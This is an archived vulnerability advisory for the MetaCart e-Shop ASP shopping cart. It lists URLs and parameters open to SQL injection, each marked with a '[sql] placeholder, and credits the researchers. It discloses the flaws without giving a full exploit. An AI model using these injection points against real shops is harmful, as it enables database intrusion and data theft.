TUCoPS :: Web :: e-commerce, shopping carts :: b06-5790.htm

MetaCart e-Shop
MetaCart e-Shop
MetaCart e-Shop



vendor site:http://metalinks.com/ 
product:MetaCart e-Shop
bug:injection sql
risk:medium



injection sql (get) :
http://site.com/metacart/productsByCategory.asp?intCatalogID='[sql] 
http://site.com/metacart/product.asp?intProdID='[sql] 
injection sql(post) :

1 )http://site.com/metacart/searchAction.asp 
variables :
/metacart/searchAction.asp?chkText=yes&strText='[sql]

2)http://site.com/metacart/searchAction.asp 
variables :
/metacart/searchAction.asp?chkText=yes&strText=1&chkPrice=yes&chkCat=yes&sub
mit1=Submit&intPrice='[sql]

3)http://site.com/metacart/searchAction.asp 
variables :
/metacart/searchAction.asp?chkText=yes&strText=1&chkPrice=yes&chkCat=yes&sub
mit1=Submit&intPrice=all&strCat='[sql]


laurent gaffi=E9 & benjamin moss=E9
http://s-a-p.ca/ 
contact: saps.audit@gmail.com 

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH